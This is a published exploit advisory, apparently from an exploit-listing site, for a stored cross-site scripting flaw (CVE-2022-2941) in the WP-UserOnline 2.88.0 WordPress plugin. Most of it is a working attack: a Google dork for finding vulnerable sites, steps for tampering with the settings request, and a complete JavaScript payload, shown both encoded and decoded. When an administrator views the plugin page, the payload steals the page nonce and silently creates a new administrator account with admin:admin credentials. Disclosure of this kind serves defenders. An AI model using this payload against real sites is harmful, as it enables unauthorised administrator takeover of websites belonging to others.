WP-UserOnline 2.88.0 Stored Cross Site Scripting (XSS) (Authenticated)

2024.08.08
Credit: Onur Göğebakan
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2022-2941
CWE: CWE-79
Dork: inurl:/wp-content/plugins/wp-useronline/

# Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated) # Google Dork: inurl:/wp-content/plugins/wp-useronline/ # Date: 2024-06-12 # Exploit Author: Onur Göğebakan # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip # Category: Web Application # Version: 2.88.0 # Tested on: WordPress 6.5.4 - Windows 10 # CVE : CVE-2022-2941 # Explanation: A new administrator user can be added to WordPress using a stored XSS vulnerability. # Exploit: 1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings 2. Click Save and intercept the request. 3. Change `naming%5Bbots%5D` parameter value with belowed payload ``` %3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E ``` 4. Payload executed when user visited http://poc.test/wp-admin/index.php?page=useronline 5. Administrator user added with admin:admin credentials. # Decoded payload ``` function handleResponse() { var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('POST', '/wp-admin/user-new.php', true); changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); var params = 'action=createuser&_wpnonce_create-user=' + nonce + '&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' + '&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User'; changeReq.send(params); } var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('GET', '/wp-admin/user-new.php', true); req.send(); ```


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top